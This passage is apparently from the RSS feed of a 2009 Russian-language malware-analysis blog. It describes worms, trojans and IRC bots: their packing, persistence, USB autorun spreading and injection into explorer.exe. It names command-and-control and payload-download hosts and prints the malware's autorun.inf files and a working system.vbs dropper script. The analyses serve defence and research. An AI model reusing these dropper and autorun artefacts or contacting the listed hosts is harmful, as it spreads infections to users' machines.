заражение USB дисков и т.д.), есть функция самоуничтожения. При запросе информации о версии, бот отправляет: “Built: Mar 26 2009 01:02:59 g.3.2 (g.3.2.3.fp)”.</description><link>http://gmax-blog.blogspot.com/2009/04/unwise.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFRQnBdptVGeN2qIoqZBhnWBXp_kx7mDna4vuWBMDaQgdbeuBQQSA1AlHGkZ3G_dXtj-KTs2OdOIZJl6izfw5QnbsYI2N2UbTVufiEfVITT9Tg7FU3ZypSJIzabC3O5Ye1SjxNVB4uzBc/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-3503541017876166552</guid><pubDate>Sat, 11 Apr 2009 08:07:00 +0000</pubDate><atom:updated>2009-04-11T01:09:50.447-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">&quot;the AV End&quot;</category><category domain="http://www.blogger.com/atom/ns#">china worm</category><category domain="http://www.blogger.com/atom/ns#">Delphi</category><title>Worm.Win32.AutoRun.bix</title><description>Имя файла: fnexsjs.exe&lt;br /&gt;Размер: 24,6 Кб&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/366c1b1ad51d3fd7ea8c3109e0e7b8e6&quot;&gt;http://www.virustotal.com/ru/analisis/366c1b1ad51d3fd7ea8c3109e0e7b8e6&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=16802528a2e57daa1179c67ad15bd485&quot;&gt;http://www.threatexpert.com/report.aspx?md5=16802528a2e57daa1179c67ad15bd485&lt;/a&gt; &lt;br /&gt;Файл упакован Upack. После распаковки размер ~ 150 Кб. Написан на Delphi. Качество кода отвратительное. Файл оказался китайским вирусом, написанным на делфи, логика работы соответствующая… Делает следующие: копирует себя в папки “Common Files\System\” и “Common Files\Microsoft Shared\”, копируется на все диски в качестве autorun(для этого перебирает все буквы), inf файл такого вида: &lt;br /&gt; [AutoRun]&lt;br /&gt;open=fnexsjs.exe&lt;br /&gt;shell\open=ґтїЄ(&amp;O)&lt;br /&gt;shell\open\Command=fnexsjs.exe&lt;br /&gt;shell\open\Default=1&lt;br /&gt;shell\explore=ЧКФґ№ЬАнЖч(&amp;X)&lt;br /&gt;shell\explore\Command=fnexsjs.exe&lt;br /&gt;,отключает показ скрытых файлов, прописывается в автозапуск, отключает некоторые сервисы (wscsvc, helpsvc, wuauserv, SharedAccess), не дает перезагрузится в безопасный режим, по заголовку окна убивает некоторые процессы (диспетчер процессов, IceSword и т.д.), ставит себя отладчиком при старте некоторых файлов (Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\) и еще уйма китайского кода. Возможные китайские названия: &quot;the AV End&quot;, &quot;Animal Virus&quot;, &quot;the Kind of AV End&quot;. Командный центр: &lt;span style=&quot;font-weight:bold;&quot;&gt;www.webweb.com&lt;/span&gt;.</description><link>http://gmax-blog.blogspot.com/2009/04/wormwin32autorunbix.html</link><author>noreply@blogger.com (GMax)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-2919452427799734471</guid><pubDate>Mon, 30 Mar 2009 16:43:00 +0000</pubDate><atom:updated>2009-03-30T09:54:54.914-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">UrlDownloadToFile</category><title>Trojan-Downloader.Win32.Injecter.cax</title><description>Имя файла: wpv771230262576.cpx.exe&lt;br /&gt;Размер: 80,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 29 января 2009 г. 13:36:03&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/1e77cd297ac8179a642d5c3bf6244e6c&quot;&gt;http://www.virustotal.com/ru/analisis/1e77cd297ac8179a642d5c3bf6244e6c&lt;/a&gt; &lt;br /&gt;Файл запакован UPX. После распаковки 196 Кб. В файл местами добавлен однотипный мусорный код с вызовом API функций. Строки в файле не зашифрованы, а просто разряжены. Каждый символ занимает не 1 или 2 байта, а 4 байта. Далее инициализируется импорт. Из файла завлекается DLL, хранящаяся так же в разряженном виде, и сохраняется в файл &quot;…\system32\crypts.dll&quot;. Библиотека ставится в автозагрузку &quot;…\CurrentVersion\Winlogon\Notify\crypt&quot;. Затем производится инжект в процесс explorer.exe. В инжектирумом коде происходит общение с командным центром  &lt;span style=&quot;font-weight:bold;&quot;&gt;http://af9f330a59.com&lt;/span&gt;. &lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqDyYrNl9mvWjvUdNHYKDOlpKyudd3ceF9JquIBCcAo0D-TF4YOG04gPh1oydOjTvLpUFA12XLeJ6qYsjI5ptxhFUHdPXnuaiQfU-zFEk5EqVO09rrJMo7k_ZQ58lQw0OOvQWNezJaew8/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 61px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqDyYrNl9mvWjvUdNHYKDOlpKyudd3ceF9JquIBCcAo0D-TF4YOG04gPh1oydOjTvLpUFA12XLeJ6qYsjI5ptxhFUHdPXnuaiQfU-zFEk5EqVO09rrJMo7k_ZQ58lQw0OOvQWNezJaew8/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5319023107049451826&quot; /&gt;&lt;/a&gt;&lt;br /&gt;На сервер передается строка, идентифицирующая заращенный компьютер (сетевое имя и серийный номер HDD), причем происходит это с помощью функции UrlDownloadToFile, т.е. ответ сначала сохранятся в файл (папка TEMP), а затем оттуда читается. Мне на запрос пришла строка “0SLP:3600;MOD:dAcbf6;URL:http://hansali4.com/731l2.exe;SRV:stoped;”.  &lt;br /&gt;Затем скачивается указанный файл и  запускается на исполнение.&lt;br /&gt;Имя файла: crypts.dll&lt;br /&gt;Размер: 31,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 29 января 2009 г. 13:35:57&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/01ab49e7f23228d1cc1d359a51a2e4b1&quot;&gt;http://www.virustotal.com/ru/analisis/01ab49e7f23228d1cc1d359a51a2e4b1&lt;/a&gt; &lt;br /&gt;Файл запакован UPX. После распаковки 72 Кб. Полностью повторяется функционал инжектируемого в процесс explorer.exe кода дропера (предыдущий файл).&lt;br /&gt;Имя файла: 731l2.exe&lt;br /&gt;Размер: 71,0 Кб&lt;br /&gt;Time/Date Stamp (GMT): 10 марта 2009 г. 15:42:01&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/e7f26d770daac1f686fca0a74d371800&quot;&gt;http://www.virustotal.com/ru/analisis/e7f26d770daac1f686fca0a74d371800&lt;/a&gt;&lt;br /&gt;Файл запакован UPX. После распаковки 164 Кб. Программа занимается рассылкой спама.&lt;br /&gt;Командные центы расположены по адресам: &lt;span style=&quot;font-weight:bold;&quot;&gt;&lt;br /&gt;https://83.133.127.5/mrl2/, &lt;br /&gt;https://212.117.185.20/ost/i2.php, &lt;br /&gt;https://85.17.168.141/base.php&lt;/span&gt;.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3bkFysYOSezoIg9LNWDBnE4c8Yw4lLV3WM9-F9kUsi-o0KcSYqg5IHUDB7M8EEB19i7jDmyPwa7BDdfeyzJB8nI6QaNI1pP-WQUZsMso9S8TR78JFmvIKpUv4pYcO39hL5bVwR_7Ne9M/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 206px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3bkFysYOSezoIg9LNWDBnE4c8Yw4lLV3WM9-F9kUsi-o0KcSYqg5IHUDB7M8EEB19i7jDmyPwa7BDdfeyzJB8nI6QaNI1pP-WQUZsMso9S8TR78JFmvIKpUv4pYcO39hL5bVwR_7Ne9M/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5319023943958629010&quot; /&gt;&lt;/a&gt;</description><link>http://gmax-blog.blogspot.com/2009/03/trojan-downloaderwin32injectercax.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqDyYrNl9mvWjvUdNHYKDOlpKyudd3ceF9JquIBCcAo0D-TF4YOG04gPh1oydOjTvLpUFA12XLeJ6qYsjI5ptxhFUHdPXnuaiQfU-zFEk5EqVO09rrJMo7k_ZQ58lQw0OOvQWNezJaew8/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-973844201024067039</guid><pubDate>Tue, 17 Mar 2009 16:58:00 +0000</pubDate><atom:updated>2009-03-22T13:08:06.291-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">IRC</category><category domain="http://www.blogger.com/atom/ns#">Macrovisions</category><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">usb infect</category><title>Trojan.Win32.Agent.brcu</title><description>Имя файла: system.exe&lt;br /&gt;Размер: 56,0 Кб&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/d3eba3d6f8bbba80c9adf8e799376d76&quot;&gt;http://www.virustotal.com/ru/analisis/d3eba3d6f8bbba80c9adf8e799376d76&lt;/a&gt; &lt;br /&gt;Файл не чем не запакован, написан на Delphi. Вначале расшифровывает строки, затем инициализирует импорт. В секции ресурсов хранится еще один исполняемый файл. Файл system.exe запускается еще раз с флагом SUSPENDED, затем туда из секции ресурсов копируются данные, изменяется контекст процесса и процесс размораживается.&lt;br /&gt;Размер: 15,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 15 февраля 2009 г. 15:59:45&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/481433938bf01a62790bc1328565466a&quot;&gt;http://www.virustotal.com/ru/analisis/481433938bf01a62790bc1328565466a&lt;/a&gt; &lt;br /&gt;Файл запакован UPX. После распаковки ~57 Кб.  В качестве мютекса (и еще в нескольких местах) используется слово Macrovisions. Далее файл копируется в системную директорию. Переводит системную дату на 01.01.2070г. Добавляет себя в исключения файрвола. Ставит себя на автозагрузку в ветку “…\CurrentVersion\Winlogon” вместе с userinit.exe или, если не получается, в стандартную ветку “…\CurrentVersion\Run”. Затем делается инжект в процесс explorer.exe, в этом потоке проверяем мютекс и при необходимости вновь запускаем процесс (system.exe). Далее (для XP) снимаются хуки с SSDT из Ring3 с помощью NtSystemDebugControl.&lt;br /&gt;Из тела программы извлекается драйвер, записывается в папку TEMP, устанавливается и загружается в систему. Далее запускаются 3 потока: в первом ведется работа с ключами реестра, ставятся нотификаторы на изменение, во втором создается окно, в оконной процедуре которого обрабатывается сообщение о подключении USB диска, с последующим его заражением, в третьем потоке происходит сетевое общение (IRC) с командным центом &lt;span style=&quot;font-weight:bold;&quot;&gt;money.pornoturkiye.com&lt;/span&gt;. &lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf4JxSOWRHAAM2fiuw-QTxvhrwoDxwutd767OibzW7EnbG92gcu11G_7YQzcD5mSvxyZNy97_mtuEeCt1qkOLcIgQekJAUYTO6N_VOMLd1_cY1hvYSkDCu00rczuA3v6Q3-yjjHmpmFB0/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 41px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf4JxSOWRHAAM2fiuw-QTxvhrwoDxwutd767OibzW7EnbG92gcu11G_7YQzcD5mSvxyZNy97_mtuEeCt1qkOLcIgQekJAUYTO6N_VOMLd1_cY1hvYSkDCu00rczuA3v6Q3-yjjHmpmFB0/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5314203259983855282&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Бот умеет скачивать и запускать файлы, оправлять запрашиваемый файл, слать ICMP запросы на какой-либо сайт. Кроме того, бот умеет искать определенные процессы (хеш от имени) и выполнять для них предварительно заложенные действия, а именно добавлять информацию в определенные окна. Причем делать это не традиционным способом, а через буфер обмена.&lt;br /&gt;Размер: 4,0 Кб&lt;br /&gt;Time/Date Stamp (GMT): 13 февраля 2009 г. 4:44:16&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/9b7b99601348d217574dc85e9f673462&quot;&gt;http://www.virustotal.com/ru/analisis/9b7b99601348d217574dc85e9f673462&lt;/a&gt; &lt;br /&gt;Не чем не обработан, строки зашифрованы. Руткит занимается тем, что ставит хуки на обращение к реестру и фильтрует функции ObReferenceObjectByHandle и IofCallDriver, тем самым, маскируя основную программу.</description><link>http://gmax-blog.blogspot.com/2009/03/trojanwin32agentbrcu.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf4JxSOWRHAAM2fiuw-QTxvhrwoDxwutd767OibzW7EnbG92gcu11G_7YQzcD5mSvxyZNy97_mtuEeCt1qkOLcIgQekJAUYTO6N_VOMLd1_cY1hvYSkDCu00rczuA3v6Q3-yjjHmpmFB0/s72-c/02.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-423205287484283996</guid><pubDate>Mon, 09 Mar 2009 11:13:00 +0000</pubDate><atom:updated>2009-03-09T04:21:36.278-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">usb infect</category><title>Worm.Win32.AutoRun.eze</title><description>Имя файла: cfixer.exe&lt;br /&gt;Размер: 15,9 Кб&lt;br /&gt;Time/Date Stamp (GMT): 5 декабря 2008 г. 17:30:47&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/07f1a961237157256252ec471c36790e&quot;&gt;http://www.virustotal.com/ru/analisis/07f1a961237157256252ec471c36790e&lt;/a&gt;&lt;br /&gt;Файл почти полностью идентичен &lt;a href=&quot;http://gmax-blog.blogspot.com/2009/03/backdoorwin32ircboteqq.html&quot;&gt;Backdoor.Win32.IRCBot.eqq&lt;/a&gt;, за сключением нескольких строк (имя файла, адрес C&amp;C, мютекс и т.д.). Адрес командного центра &lt;span style=&quot;font-weight:bold;&quot;&gt;mh.patex.org&lt;/span&gt;.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6U5pt8K_wNXX6Bu1zXzdM8vY3oKiNDBf6-LI31O5rABr-ke2mvwPzR0PLY8YXxs9Zw0xNRC2DzV3VPg80BH1XYy2i8Udum31WzF91RNUUojyDor1QGbhE6ijRqnMw3YUx7NCN469KUU/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 51px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6U5pt8K_wNXX6Bu1zXzdM8vY3oKiNDBf6-LI31O5rABr-ke2mvwPzR0PLY8YXxs9Zw0xNRC2DzV3VPg80BH1XYy2i8Udum31WzF91RNUUojyDor1QGbhE6ijRqnMw3YUx7NCN469KUU/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5311145210772699202&quot; /&gt;&lt;/a&gt;&lt;br /&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/03/wormwin32autoruneze.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6U5pt8K_wNXX6Bu1zXzdM8vY3oKiNDBf6-LI31O5rABr-ke2mvwPzR0PLY8YXxs9Zw0xNRC2DzV3VPg80BH1XYy2i8Udum31WzF91RNUUojyDor1QGbhE6ijRqnMw3YUx7NCN469KUU/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-5020558640796429103</guid><pubDate>Fri, 06 Mar 2009 13:29:00 +0000</pubDate><atom:updated>2009-03-06T05:32:13.777-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">usb infect</category><title>Backdoor.Win32.IRCBot.eqq</title><description>Имя файла: reg32.exe&lt;br /&gt;Размер: 14,7 Кб&lt;br /&gt;Time/Date Stamp (GMT): 26 июля 2008 г. 21:42:44&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/5f0ca337ff3055ff342a31dacef8bbce&quot;&gt;http://www.virustotal.com/ru/analisis/5f0ca337ff3055ff342a31dacef8bbce&lt;/a&gt; &lt;br /&gt;Файл обработан упаковщиком eXPressor v1.4. Программа расшифровывает строки, находит адреса нужных функций и производит  запись всего этого в процесс explorer.exe, а затем запускает удаленный поток в этом процессе. Копирует себя в папку C:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\ и тут же создает файл Desktop.ini:&lt;br /&gt;&lt;span style=&quot;font-style:italic;&quot;&gt;[.ShellClassInfo]&lt;br /&gt;CLSID={645FF040-5081-101B-9F08-00AA002F954E}&lt;/span&gt;&lt;br /&gt;Устанавливает себя в автозапуск через ключ реестра HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components. &lt;br /&gt;Ищет USB диски и если находит, то копирует себя также в RECYCLER и устанавливает в автозапуск. В случаи  заражения информирует сервер сообщением: &quot;PRIVMSG ##e :Infected usb drive: D:&quot;&lt;br /&gt;Далее соединяется с серверами: &lt;span style=&quot;font-weight:bold;&quot;&gt;shop.hostswiss.com&lt;/span&gt;, &lt;span style=&quot;font-weight:bold;&quot;&gt;shop.m-n-g.info&lt;/span&gt;, &lt;span style=&quot;font-weight:bold;&quot;&gt;shop.worldadult.biz&lt;/span&gt; откуда и производится управление ботом. Умеет скачивать и запускать на исполнение файлы.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOo3u1uYiqsibWBZYdPrjp1Hm83uYWEYy-WBRHkFij9XK-gYMlVadCqQMcZXLwiYHbhF3l4GjWLYTiohIFedUhj0nreO1wjtTIPcw_IxRhT_28NT9HaF-d2iP6SlS6lb0r-5tAGoI5X8g/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 88px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOo3u1uYiqsibWBZYdPrjp1Hm83uYWEYy-WBRHkFij9XK-gYMlVadCqQMcZXLwiYHbhF3l4GjWLYTiohIFedUhj0nreO1wjtTIPcw_IxRhT_28NT9HaF-d2iP6SlS6lb0r-5tAGoI5X8g/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5310066679327666322&quot; /&gt;&lt;/a&gt;&lt;br /&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/03/backdoorwin32ircboteqq.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOo3u1uYiqsibWBZYdPrjp1Hm83uYWEYy-WBRHkFij9XK-gYMlVadCqQMcZXLwiYHbhF3l4GjWLYTiohIFedUhj0nreO1wjtTIPcw_IxRhT_28NT9HaF-d2iP6SlS6lb0r-5tAGoI5X8g/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-2241773053322837472</guid><pubDate>Tue, 03 Mar 2009 16:41:00 +0000</pubDate><atom:updated>2009-03-03T09:27:28.416-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">Ping Pong</category><title>Trojan.Win32.Agent.bsdh</title><description>Имя файла: Keygen.Tag.&amp;.Rename.3.4.6.exe&lt;br /&gt;Размер: 28,5 Кб&lt;br /&gt;Time/Date Stamp (GMT): 24 февраля 2009 г. 16:27:33&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/c37dc61e6001a6c1dd5c8cce5e902489&quot;&gt;http://www.virustotal.com/ru/analisis/c37dc61e6001a6c1dd5c8cce5e902489&lt;/a&gt;&lt;br /&gt;Файл упакован UPX. Затем идет слой еще одного упаковщика, который выделяет память, расшифровывает туда каждую секцию файла, копирует, настраивает импорт и запускает на исполнение основную программу. Программа собирает различные сведения о системе: версия Windows, версия Internet Explorer, какой антивирус установлен, количество сетевых соединений и т.д. Затем собранные данные шифруются (xor) и кодируются в BASE64 для отправки на адрес: &lt;br /&gt;&lt;span style=&quot;font-weight:bold;&quot;&gt;http://traff.loadmore.eu&lt;/span&gt;.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinFzVT8bEsyqmLMd_QQWKTAPDT73PL6WdHhpGm-3LibBBzSHqPYll4r8ebgQg59aeLa1h8iRjxgPYORua6xu74rgLsWcn9AZ0onFpbxTe1WLplszCDBl-MBZ2jHxv1pd0K7BoPz6VUQOE/s1600-h/03.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 117px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinFzVT8bEsyqmLMd_QQWKTAPDT73PL6WdHhpGm-3LibBBzSHqPYll4r8ebgQg59aeLa1h8iRjxgPYORua6xu74rgLsWcn9AZ0onFpbxTe1WLplszCDBl-MBZ2jHxv1pd0K7BoPz6VUQOE/s400/03.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5309004436075416658&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Запускается дополнительно еще один поток, который ждет соединения на 10100 порту. При установлении соединения, если пришло слово ‘PING’, шлет в ответ слово ‘PONG’. Кроме того, программа умеет скачивать в папку TEMP файлы и запускать их на исполнение.&lt;br /&gt;2009, GMax&lt;br /&gt;e_gmax@mail.ru</description><link>http://gmax-blog.blogspot.com/2009/03/trojanwin32agentbsdh.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinFzVT8bEsyqmLMd_QQWKTAPDT73PL6WdHhpGm-3LibBBzSHqPYll4r8ebgQg59aeLa1h8iRjxgPYORua6xu74rgLsWcn9AZ0onFpbxTe1WLplszCDBl-MBZ2jHxv1pd0K7BoPz6VUQOE/s72-c/03.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-6308446790224618737</guid><pubDate>Fri, 27 Feb 2009 17:13:00 +0000</pubDate><atom:updated>2009-02-27T11:58:55.913-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">HTTP/SOCKS Bot</category><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">Px.ax</category><title>Backdoor.Win32.Agent.adse</title><description>Имя файла: bot.dll&lt;br /&gt;Размер: 59 Кб&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/5b2d2c83020f9257315c2e8d4e5ce2d5&quot;&gt;http://www.virustotal.com/ru/analisis/5b2d2c83020f9257315c2e8d4e5ce2d5&lt;/a&gt;&lt;br /&gt;Более новая версия библиотеки Px.ax из предыдущего поста (&lt;a href=&quot;http://gmax-blog.blogspot.com/2009/02/trojanwin32agentbryp.html&quot;&gt;Trojan.Win32.Agent.bryp&lt;/a&gt;). Вначале идет фейк код из мусорного кода с ложными вызовами API функций. Непосредственно сам рабочий код был значительно увеличен, добавлена поддержка работы в режиме прокси серверов (HTTP и Socks). Бот теперь называется “HTTP/SOCKS Bot v1.8”. Прокси сервера выполнены в виде отдельных потоков. Бот ведет подробный лог своей работы в файле “C:\automate.bin”. Кроме основного C&amp;C сервера –“&lt;span style=&quot;font-weight:bold;&quot;&gt;trafficmonsterinc.ru&lt;/span&gt;”, был добавлен еще и дополнительный “&lt;span style=&quot;font-weight:bold;&quot;&gt;controller.505.ru&lt;/span&gt;”. Существует еще upload сервер “&lt;span style=&quot;font-weight:bold;&quot;&gt;http://uploasssssd.com&lt;/span&gt;”.  На сервер отправляется информация о компьютере жертвы, доступных портах, времени пинга, а так же с помощью запросов на сайт www.ip2location.com информация о внешнем IP адресе и стране к которой он относится. Управляется бот с помощью конфига, который скачивает с C&amp;C. Дополнительно скачивает следующие файлы: &lt;span style=&quot;font-weight:bold;&quot;&gt;http://trafficmonsterinc.ru/gg.dll&lt;/span&gt; сохраняется под именем “C:\windows\gif32.dll” и загружается, &lt;span style=&quot;font-weight:bold;&quot;&gt;http://trafficmonsterinc.ru/ggg.dll&lt;/span&gt; сохраняется под именем “ C:\windows\zavsmob.dll” и устанавливается как BHO. &lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6jZpcRITqt4dydIP-Lo16BFwpau0kLrBAcbqr8xtR-Km2zH0BYeNBTiGIkY8C7V5lzalvvR0dSzgyNOPp6uRLcLnj5pn6uNi-36K6cu2Z0U2XipbpvlM166A7mhyYM26x3RW7f7nURO0/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 71px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6jZpcRITqt4dydIP-Lo16BFwpau0kLrBAcbqr8xtR-Km2zH0BYeNBTiGIkY8C7V5lzalvvR0dSzgyNOPp6uRLcLnj5pn6uNi-36K6cu2Z0U2XipbpvlM166A7mhyYM26x3RW7f7nURO0/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5307527154860783634&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Имя файла: gg.dll&lt;br /&gt;Размер: 12 Кб&lt;br /&gt;Time/Date Stamp (GMT): 5 февраля 2009 г. 20:31:33&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/8ff89c052411c8ff1c4c8b48ec24f6c0&quot;&gt;http://www.virustotal.com/ru/analisis/8ff89c052411c8ff1c4c8b48ec24f6c0&lt;/a&gt; &lt;br /&gt;Файл упакован UPX. После распаковки ~53 Кб. Скачивает следующие файлы: &lt;span style=&quot;font-weight:bold;&quot;&gt;http://trafficmonsterinc.ru/bot2.exe&lt;/span&gt; (разобран в предыдущем посте под именем “12177.exe”) сохраняет под именем “_img358.gif”, &lt;span style=&quot;font-weight:bold;&quot;&gt;http://trafficmonsterinc.ru/folder.ico&lt;/span&gt; сохраняет под именем “_img359.gif”. Далее запускается поток, в котором ищутся съемные диски (флешки) и записывается туда файл “autorun.inf” со следующим содержанием: &lt;br /&gt;&lt;span style=&quot;font-style:italic;&quot;&gt;[autorun]&lt;br /&gt;action=Open folder to view files&lt;br /&gt;icon=folder.ico&lt;br /&gt;shellexecute=system.vbs&lt;br /&gt;LABEL=My Drive&lt;/span&gt;&lt;br /&gt;Далее записывается файл “system.vbs”: &lt;br /&gt;&lt;span style=&quot;font-style:italic;&quot;&gt;On Error Resume Next&lt;br /&gt;Const Hidden = 2&lt;br /&gt;Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;)&lt;br /&gt;WshShell.Run &quot;.\&quot;&lt;br /&gt;Set fso = CreateObject(&quot;Scripting.FileSystemObject&quot;)&lt;br /&gt;fso.CopyFile &quot;system2.exe&quot;, &quot;c:\system.exe&quot;,TRUE&lt;br /&gt;Set objFile = fso.GetFile(&quot;c:\system.exe&quot;)&lt;br /&gt;If objFile.Attributes Then&lt;br /&gt;objFile.Attributes = Hidden&lt;br /&gt;End If&lt;br /&gt;WshShell.Run &quot;c:\system.exe&quot;&lt;/span&gt;&lt;br /&gt;Сохраняется файл “folder.ico” со скаченной ранее иконкой и непосредственно сам “system2.exe” (скаченный ранее “bot2.exe”). Затем запускается процедура заражения *.exe файлов: сначала ищутся все папки в корне диска, затем процедура повторяется рекурсивно для каждой найденной папки, далее ищутся exe файлы и происходит их заражение. При заражении пропускаются файлы “system2.exe”, 